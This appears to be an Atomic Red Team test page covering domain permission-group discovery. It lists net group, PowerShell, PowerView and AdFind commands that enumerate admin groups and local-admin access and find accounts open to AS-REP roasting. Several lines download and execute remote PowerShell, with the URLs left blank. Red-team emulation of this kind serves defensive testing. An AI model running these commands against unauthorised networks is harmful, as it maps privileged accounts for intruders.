Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.Commands such as
net group /domain
of the Net utility,dscacheutil -q group
on macOS, andldapsearch
on Linux can list domain-level groups.
Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)
Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)
Atomic Test #3 - Elevated group enumeration using net group (Domain)
Atomic Test #4 - Find machines where user has local admin access (PowerView)
Atomic Test #5 - Find local admins on all machines in domain (PowerView)
Atomic Test #6 - Find Local Admins via Group Policy (PowerView)
Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
Supported Platforms: Windows
net localgroup
net group /domain
net group "domain admins" /domain
net group "enterprise admins" /domain
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
Supported Platforms: Windows
Name | Description | Type | Default Value |
user | User to identify what groups a user is a member of | string | administrator |
get-ADPrincipalGroupMembership #{user} | select name
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
Supported Platforms: Windows
net group /domai "Domain Admins"
net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
net group "BUILTIN\Backup Operators" /doma
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
Supported Platforms: Windows
IEX (IWR ''); Find-LocalAdminAccess -Verbose
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
Supported Platforms: Windows
IEX (IWR ''); Invoke-EnumerateLocalAdmin -Verbose
takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
Supported Platforms: Windows
Name | Description | Type | Default Value |
computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME |
IEX (IWR ''); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
When successful, accounts that do not require kerberos pre-auth will be returned
Supported Platforms: Windows
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
Write-Host Joining this computer to a domain must be done manually.
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~"
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference-,
Supported Platforms: Windows
Name | Description | Type | Default Value |
adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe |
#{adfind_path} -f (objectcategory=group)
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
Invoke-WebRequest -Uri "" -OutFile #{adfind_path}